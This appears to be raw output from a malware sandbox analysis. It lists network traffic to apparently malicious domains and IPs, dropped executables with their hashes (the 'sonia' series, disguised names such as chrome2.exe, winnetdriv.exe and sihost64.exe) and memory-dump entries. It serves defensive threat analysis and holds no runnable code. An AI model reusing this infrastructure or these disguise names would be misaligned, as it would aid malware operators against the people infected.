US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
GB 88.221.134.32:80 tcp
GB 88.221.134.32:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
FR 51.210.150.92:14433 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp
US 3.20.137.44:443 live.goatgame.live tcp
US 3.20.137.44:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 44.137.20.3.in-addr.arpa udp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 4f9c26e4bce33e121d62134abfa3bddf
SHA1 d48594bf70c80c2d60b9158f85823db5cf39d76a
SHA256 45af78e7721211c6de7ec350c00e8801a293390ed9a35bf2c9ef7267ce93c749
SHA512 f7e495a2d6d26028b74c330ba052f2424f4bd8264168b240ac6f73e71a1bf850b44c7ec01b00187b210009e1da6fb7cf577511de8a3735fba2603d55c679ddc8

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 18f49152f4673f009cfbbc1180976fba
SHA1 6d9a1f6e77ac6cc44810e66895f7db7f587af968
SHA256 55751b05ca20ea14a635da0d1bc6f766a5a15fd5a7193738beaff26aede8be94
SHA512 6299e11f77a01f752c28e3ce73e9d744bd7c75ee320786a6a89cce522613352105b0f37786d881fb48c2af5d6950d51c929623ff951e3e3c0b1e45f64d23ddcc

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 2a12b812dcb4a761a3602955c60517ef
SHA1 051391cb8899e54d0a3b943682b0cd67170f97ad
SHA256 6baa3f86b4030e6290563f61a18331b3b2e8dc0953140334acd8e633ab6974f4
SHA512 15b0dec808364af790af4233fd10e94c0e46b56cff8faebc12bc6dcbd60ed59f7fad997acfc3075f027ec97cba4bc5c88e36e04bcec56850721cb3fd32123029

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe

MD5 7a82c73b9a1b6bf3d2aefe2f3740a564
SHA1 1debd41cb9589c9ebc50b0e370d6d8da565be370
SHA256 35a72b874265e4109dd7d94a37c4417b8fb71a158c4ad10100ef112480b4a8bf
SHA512 61c110e3f12b31fb429afc2fc5b074ab6d4665a8e1b716660bc3f4ef8360ab4187d6137b553430e104998307a849ac9a5db206a2ac20665e890e9bb4c88d6787

memory/2176-48-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libgcc_s_dw2-1.dll

MD5 8cc9060d4fc1d5eef98249f47d39c746
SHA1 4777821114af24861c3095eb3ac9c89b70ca8b38
SHA256 bf973bee3d88590702e079641505072223eec169aed8117328ba7e75c496c8ab
SHA512 f26d012695eec4225aea2eb7affd73008faf2b02c11c18c678b79d593ae578000e3317b054768a4777e6ca982edfb806772675e198b0bc4d8d3c2c8420caa2c9

memory/2176-60-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2176-62-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-63-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2176-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2176-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2176-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-70-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-79-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-82-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.txt

MD5 e17c0faa31daa0a67304020496a5628e
SHA1 55458ee48312567c657dac7e324cdbca338928cd
SHA256 a60008adf056b92195c60d9e22435b863b6c1f1d40e12e5d830a28e3831166c1
SHA512 d8452fee7794ca810894e11c5b0b8227b30c8cd707b3ae64a9b29abb7bad0d3f1e1e8a9aeaab43a1c17cca854e5b9c40885db8a4a8730affaa303e4682dc718a

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.txt

MD5 e1ccf1fd5a4e6c1edb774a42ccee2b7b
SHA1 67ba5d76ea49aa6dc3d94027966a05c4c8adfabd
SHA256 be958aa7672b7eeabd668cd8c0893eb22b84ab490dbef447b142e191b4ef97e0
SHA512 cbc421b0e803cf1fd85171fc653fc5c26f45aaa02971cec2000d3c0d7fead07f39300ccbe3c11b21bd0938baca95b32d95235926c86f02677594378bc97ad8b0

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.txt

MD5 e067b0b74aff3609d8f71ff7375f25d7
SHA1 8857195018560d431a0f7ad1f8fac1a059e3a38e
SHA256 b3e2deaa9fdeac58349018c5415efb53c7b3397ceef77bf0d83ada5a627c8f11
SHA512 1afdb77379ffceb07c4906a2ab22da6ec6c0b1dd908b7b45f18deb736aa92cb5d8ec706f252a62a064bae70746260239c30f7a460413fe730d25db5b77465bc2

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.txt

MD5 ada981fe0dabe48e105f5314cfd34a4e
SHA1 d4d04f50c57e7b296ec7e2548bf3359a5af9c209
SHA256 c75e7758abf7f8d9988df114ff6c8d30028a4c3e18a3b1113f892781b657a85d
SHA512 aec0dc9e9ecad1121bef197ec0a66ba17dda17bf78d9e6d44ef20efe436dd39b5069538dcb3eef7c4f963594bd2d6949d359dfb371042111e26b6a7910931b05

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.txt

MD5 2196970ef6c6bd1d8c78a3016965c145
SHA1 17cb07e0ee5ee82f7fe4820bd3422cc9c4eeb487
SHA256 236cf5afe5c36318a696b3a72f12e5e6559ceed1faf08eecf8542e8077b6c94c
SHA512 fceee96e27bb4337d7f89f3e439bde62b251501966549384a4fa9bda5ae1f852558bed76b5d0dcca454ad2499ab26c78001794653209b900fca1c2f69df0b927

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.txt

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.txt

MD5 df63a9bc141064c6115fcc889abf3b8c
SHA1 040d6ed844e41647fbc0ee0ad5db14bb94b50131
SHA256 c9f36e88dac9aa0c0653df695e3e50a123fb0dd63692312d5cacbf5479530446
SHA512 3270ce7f1d4da1b4e88264b439f82bd1e95e3ef1549b90edcfdc6fadd50bb12bda8fcbb0144f5902b2339f8834d3b9b0686591708cbd655d40dd093c2976a815

memory/2176-81-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-80-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-78-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-77-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2176-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.txt

MD5 6890dcc70fef18b23b63767aeb7a70bb
SHA1 4f759828e49f3e666980444f5694ed43bef6ae70
SHA256 9ac8cb29aa93571f2ee47202c9e42720026a00526b18b96b9a8f91a8c7b2431e
SHA512 0789728ab08f70458005c23c2e08542fe97948ffb696ce8d3049aa45c3d6cc2ab5c6d6beea5fc481b287e9e97b8353026eff3eedfdf52f4484c389c6bb0f2150

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe

MD5 b61e7c8808a6aeff45299b2524cb1a95
SHA1 6595885d9cac2764bb57f1cbaff23ee9e35d1f74
SHA256 bef345787002b93d2b863e7e338e2f462afe7990e7b0ba6bf5effaf30b829be7
SHA512 92a710b42738b07bd9342072966acbb602b8c19ebf744d7274ba8f08e3b8a185b48094485c4bb4ec1e23cbec84634368a5d000f4c045cf4a37a3c359a391f119

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe

MD5 6256324adebccae067063ec64619ec01
SHA1 15f5c6590e0295f9f6f54a1bfc3988c17b1345d0
SHA256 6f7a65da9fb30461ba43208e499f34b360881563eb339af38dc67a2d47017c4e
SHA512 9c7832468dc6dc9e6f986258ade1d621d512ac69847f22c08822d5ba21d46b44f6e9bce976c32116331b704216a9584def2fa4ce662a4899e9d4b5d826157958

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe

MD5 761ce037cbee9dd5ab4618525988496c
SHA1 a52d2865df04c93e1d31c382073eb7fb323ab998
SHA256 9545fad741b79a7e1237d7e4ebc4f783de408bbbdacb61eec50f921f28bdb7b9
SHA512 fb82f5cabcaf353ac5d11e29f7c85aea77aba3fd9357546e8d249f0f7df76ae24d718a4035a864ed8fbf6d573f3557b407d701c1e2997c7bf73953ef4dd02143

memory/4748-102-0x0000000000120000-0x000000000020E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe

MD5 5ee7e1b0262fe354ae7f09806c1b01e3
SHA1 e883419707a4641296fa1c9a5df328c68a1405c3
SHA256 fcc24753aa8844438ff479f54b951d699337e8f022eb2964d1e8cb3b6012e9d9
SHA512 ec580e667c5895f4576f0c79fc24be8712fa970ea2b07a04675fdad2725ad4562115f73955b5e08794a6c00e89d7d5e96eece8778b9333c8e0abf9b3a363ebe2

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe

MD5 e5b337a345d9e81b9087c295aa2b4136
SHA1 fcd8e4027099371dca95148efa06fb7e4a4812c3
SHA256 c232b872e2d9d97be812d323dad87d4201365bdf64cdaae3a51d2c3a691534f2
SHA512 77244dbd3b581240334580cef76343cea2ed1f0ee86ad97aa167b5b751ed00c97b4d5a16ebcac4ad41b561313baa9204755e20abc601ca803d7854287b2d4cfc

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

MD5 48f54e05963f2f9fac356613b4fae183
SHA1 3fb94918bd982df89c44ce37d82e602814a390fd
SHA256 83283877a323769ce2195a92eafd8865143ea05612445b4583af9a7ad2192b93
SHA512 217851ae0f056c031e7e89f3668688eea41856472133451d04238acd5b26b7c6a8996663c148e235a6b20ec9f2c337f33e4dd15929700d5d5085191e85a48282

memory/4748-107-0x0000000073910000-0x00000000740C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe

MD5 222d4200d6c2b73ff813c472574fa8a8
SHA1 ff5af087d33986ea371d037831f4152f9941f165
SHA256 0fe761e033e51ccb97cd7af67cbe872f820dd4959b281af81976681b5afc0aa8
SHA512 0a1ed129fd88290bbf953d38dd8a1b0a7885e9307e964bc1fadcade5d07543ffe3bfef54cefffd9fde4fee7c6388536589c88ae76ce99d6663ef3c462729929b

memory/4400-109-0x0000000000740000-0x00000000007AA000-memory.dmp

memory/1588-100-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4400-111-0x0000000073910000-0x00000000740C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe

MD5 d5150e7c78eac749b00f0c0d803914f4
SHA1 ff00396e2d2c029738453ec66bf63a8d39512c83
SHA256 61e83ca939ee966f83663418b9bc88987370f25ee5f1897c4928507be5c54332
SHA512 8d891f3986952ec0a065287f36ef6ae4366e09501c587b45f993c6353111e1d326431d586e3aed5e6f843a627b635bd460c31efd4ce801a82d675c52bf6d5e60

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.txt

MD5 7c61996bdaf647b491d88063caecbf0c
SHA1 38f6448a659e294468ee40f7dfebf1277c3771f1
SHA256 de67bb06f8462526665e4b791f5b90f3e2c248eec21f4cab5954b322eed25d46
SHA512 c92cb5711ce691c4cca9e786172e713ce5da7c463ebe0e2973ce0d63454faafb568c99e90f182839b06e4103a1bf361eb9089a5b9125b04e38a9f35a949780cc

memory/4400-115-0x0000000004FE0000-0x0000000005056000-memory.dmp

memory/1272-113-0x00000000002C0000-0x00000000002FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

MD5 2c06923b75f6d7aa0df4741a7ba85f1c
SHA1 4fce80e37e0e80d29714d05f7b124bdb739680d6
SHA256 d764f0742ffcb83e50ab55922d6985944ad4e09a385c9422c0d289a225912d71
SHA512 e4e0358afdf661eed95e81be486016ed83cdc646c06e75865fe8add419d795f0b35bd3d8a8c7c38ad93cfe8856311e0a5a86c162ee9c4af10505d2fdd2421d27

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

C:\Users\Admin\AppData\Local\Temp\is-MNNL2.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/4400-134-0x0000000004F80000-0x0000000004F9E000-memory.dmp

memory/2176-138-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-139-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1272-132-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/2176-140-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-141-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-143-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-142-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3420-147-0x0000000000DF0000-0x0000000000E00000-memory.dmp

memory/1272-144-0x0000000002360000-0x0000000002388000-memory.dmp

memory/8-145-0x0000000000400000-0x0000000002C67000-memory.dmp

memory/1588-151-0x0000000000400000-0x000000000046D000-memory.dmp

memory/3756-150-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/8-152-0x0000000002DD0000-0x0000000002DD9000-memory.dmp

memory/3756-154-0x0000000004960000-0x00000000049FD000-memory.dmp

memory/3756-153-0x0000000002E20000-0x0000000002F20000-memory.dmp

memory/3756-155-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/4400-157-0x00000000051B0000-0x00000000051C0000-memory.dmp

memory/4780-156-0x0000000000670000-0x0000000000671000-memory.dmp

memory/3420-158-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/8-159-0x0000000002FF0000-0x00000000030F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 99c083660d4b4e64464340356b5ce089
SHA1 a43322664ec72560353cbf2d6b68b3463a4690df
SHA256 96302eeeb96f5adb537d80be490e969e5bc94c9f8298eee4e75ee2897724152e
SHA512 0cd54e652f13dbc7c3242b8ffcfaa15574988b9aacf96fddc4525941302c7086bff187b92a8e9f2318c25edfa0b1a7fb9e1ce4441bb8e72abed0aa67776a0d34

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 a155e7e91cd053878f30ea6380390829
SHA1 378c96c67b2559d285d1aa09afe62a1360954132
SHA256 66d98ee6c310e5546ad81a575556693bfa9772e7f034defedffec421592a324e
SHA512 2e35784dfa68a72043accbda4816d51a917a8bd73027c5c72d5e8b46d90ad7a4e31e343b823b309bc94f1732abf0269a19081e2c9d80ef199a50c4c68c31bc84

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 6655bffb8dc5169b2eae54d6a291c12f
SHA1 4652f396cfdd85f4a36417c27076fac240b47c2b
SHA256 851cda9da7d01efddc92ed29fb6b7408414bf37c01fb9690a2101c61249b9456
SHA512 81c54c1339c0998c3d5ecf5d9a99c00846d1a3f4514ebeb55230c4ca09454b902b72dd61620915df1a39417ed9a768a6c82c6e3acadb0cd8938db6dbf9e95dc2

memory/3428-168-0x0000000002C50000-0x0000000002C66000-memory.dmp

memory/8-170-0x0000000000400000-0x0000000002C67000-memory.dmp

memory/4764-173-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/4464-176-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 1ac43adad3d56d5fc4f0fe0fe0f3c223
SHA1 af5ee0392384cf4de06d11df7aecbde45684568a
SHA256 7e2b36a203c77f68048348badce4715fa319eadf127f340a1814493d48646fa4
SHA512 934435fc6b6dfb0496797e5649b55929b027ba3b0be748ef0fe36d087c10c4aafbf3fbf03358f9c2eca3c332941b2338ccb8f81d3cb85134dafe4a9408a5e573

memory/3936-185-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 c7c97b7b062c74ce88a91cec3897f388
SHA1 6ba914c0fb71c3ce616004433ae4bc37deebad63
SHA256 275fc21c896187ab3c3c3571d8d3d570157ff30c8907931fecec8e22c8f0e87e
SHA512 d72e78b49053edcfa26ae99ee6cc3791bdb422c8d6e02094efac5d8eff095d301972030e4f56ce4a188eeaa0a78a3e12a4a491d3e982fba1372c841699bbb3b0

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

memory/4780-195-0x0000000000400000-0x0000000000516000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 eb0c098d8c513b0795f6adc2f85056c4
SHA1 6a0be3d37ca7b2689990e05f703400c03a6ba61f
SHA256 8ce4a8efed4c98bd5c94e40735e2388dd705d9e4cfeb36657d9c87d670e85212
SHA512 3f9920bb8b726e61567cf3862e53866c895b078ce91079db57c6a63f33e265437331ca0177ed7b04d06e14128cf9130c84412befd67cace4125c2290e35a23c8

memory/4748-197-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/3756-196-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/1272-218-0x0000000002350000-0x0000000002360000-memory.dmp

memory/924-219-0x0000000000400000-0x000000000045B000-memory.dmp

memory/4968-227-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Roaming\raasgsw

MD5 b1f48224b74bd5789edda9e910eef29f
SHA1 7b4271d40384d41bff8928c476020abfe70490f6
SHA256 b7e9740c81b1b49e8d3f49ec79717f4282bdf307d393d143a92e36f1abf09aa6
SHA512 58edcb222a69030ba6a94a5f545a8602e16a95c74ac9cbc92681f993602829791f7d14272d631894557819525607434678c000906379db8b9ca867a9e60b7209

memory/4400-232-0x0000000005940000-0x0000000005EE4000-memory.dmp

memory/4400-242-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/3756-254-0x0000000002E20000-0x0000000002F20000-memory.dmp

memory/1272-252-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3500-255-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2516-251-0x0000000000400000-0x000000000045B000-memory.dmp

memory/5108-258-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/5108-263-0x0000000000400000-0x000000000041E000-memory.dmp

memory/5108-270-0x00000000052C0000-0x00000000058D8000-memory.dmp

memory/5108-275-0x0000000004D30000-0x0000000004D42000-memory.dmp

memory/1088-276-0x0000000000400000-0x000000000045B000-memory.dmp

memory/5108-278-0x0000000004DD0000-0x0000000004E0C000-memory.dmp

memory/4400-271-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/3892-269-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1272-268-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/5108-285-0x0000000004E10000-0x0000000004E5C000-memory.dmp

memory/5108-284-0x0000000004F80000-0x0000000004F90000-memory.dmp

memory/2176-291-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-292-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-293-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-290-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/5108-294-0x00000000050A0000-0x00000000051AA000-memory.dmp

memory/3420-302-0x0000000001D80000-0x0000000001D92000-memory.dmp

memory/3420-300-0x00000000017A0000-0x00000000017AE000-memory.dmp

memory/3420-301-0x000000001D210000-0x000000001D220000-memory.dmp

memory/3420-315-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3468-316-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/5108-319-0x0000000073910000-0x00000000740C0000-memory.dmp

\??\c:\users\admin\appdata\local\temp\is-qvqsg.tmp\sonia_5.tmp

MD5 c5fa684642070d3ab3efef47da58d28e
SHA1 af355ec4fc0f122e0e3506fadabf582f4d6596c3
SHA256 7bed8150acf8d5b56701429cce7ed02af18b4cd543fff879af6b2bbe4521eac1
SHA512 38059a5f563197518738b77d86f09c10f1ff026af336f130b09b693bcfe8af85c799f3a66192168a4588f09583069674885c5bddf277d7d2fb2f4db9ddeeade1

memory/1588-326-0x0000000000400000-0x000000000046D000-memory.dmp

memory/5108-327-0x0000000004F80000-0x0000000004F90000-memory.dmp

memory/3468-328-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3468-329-0x000000001C4F0000-0x000000001C500000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/4964-344-0x0000000000DA0000-0x0000000000DA6000-memory.dmp

memory/4964-346-0x0000000001BE0000-0x0000000001BF0000-memory.dmp

memory/4964-345-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3468-347-0x000000001C4F0000-0x000000001C500000-memory.dmp
